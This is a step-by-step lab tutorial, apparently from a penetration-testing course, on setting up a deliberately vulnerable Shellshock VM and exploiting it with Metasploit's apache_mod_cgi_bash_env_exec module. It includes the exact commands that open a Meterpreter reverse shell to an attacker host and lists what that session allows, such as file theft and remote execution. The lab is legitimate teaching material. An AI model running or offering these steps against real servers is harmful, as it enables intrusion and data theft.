To exploit vulnerability in a webserver using Metasploit, perform the following steps:
1. Open a web browser on the Windows 8.1 machine and type www.google.com in the URL. In the Google search bar, type shellshock vm and press Enter. It will give you a
list of results. Open the result shown in Figure

2. Scroll down the Pentesterlab page and click on here as shown in Figure, to
download the ISO of a VM with Shellshock vulnerability.

3. Open the VMWare Workstation Pro after the VM is downloaded and click on
Create a New Virtual Machine as shown in Figure

It will start the New Virtual Machine Wizard as shown in Figure.
Select the Typical (recommended) radio button and click on Next, as shown in Figure

4. It will open the Guest Operating System Installation window as shown in Figure

5. Click on Browse and navigate to the ISO you have downloaded in Step 2. Click
on Next as shown in Figure

It will open a Select a guest operating system window as shown in Figure
6. Leave the options to default and click Next as shown in Figure

It will open the Name the virtual machine window as shown in Figure.
Type shellshock in the Virtual Machine name: text box and click on Next as shown in
Figure

It will open a Specify Disk Capacity window as shown in Figure
7. Leave the options to default and click on Next as shown in Figure

8. Review the settings and click on Finish, as shown in Figure

9. It will start installing the virtual machine. When the virtual machine will be
completely installed, it will show you a command-line window as shown in Figure

10. Type the command ifconfig and press Enter to view the IP address configuration
of the machine, as shown in Figure

11. Switch and login to the Kali Linux VM. Open a web browser as shown in Figure

12. Type http://192.168.0.109 and press Enter to check if the webs server is up and
running, as shown in Figure. Here, 192.168.0.109 is the IP address of the shellshock VM.

13. Type http://192.168.0.109/cgi-bin/status and press Enter to check if there is a
shellshock vulnerability in the webserver, as shown in Figure. If it shows an output as
shown in Figure, then there is a shellshock vulnerability

14. Open the Metasploit tool. It will open a window, as shown in Figure

15. Type the command ‘use exploit/multi/http/apache_mod_cgi_bash_env_exec’
and press Enter to select the exploit, as shown in Figure

16. Set the lhost using the command ‘set LHOST 192.168.0.133’ and press Enter. The
IP of the Kali Linux is 192.168.0.133, as shown in Figure

17. Set the rhost using the command ‘set RHOST 192.168.0.109’ and press Enter. The
IP of the Shellshock VM is 192.168.0.109, as shown in Figure

18. Set the TargetURI using the command ‘set TARGETURI /cgi-bin/status’ and
press Enter, as shown in Figure

19. Set the payload using the command ‘set payload linux/x86/meterpreter/
reverse_tcp’, and press Enter, as shown in Figure

20. Type ‘exploit’ and press Enter to run the exploit in the background, as shown in
Figure 102. It will open a Meterpreter session

From this opened meterpreter session, you can perform the following tasks:
View the files and directories located in the machine,
Delete, upload and download files from the machine,
Execute applications remotely,
List the processes,
Launch a shell,
Reboot or shutdown the machine, etc.

21. Type help and press Enter to view the help on the meterpreter commands, as
shown in Figure

22. Type arp and press Enter to view the ARP cache, as shown in Figure

23. Type ipconfig and press Enter to view the IP configuration, as shown in Figure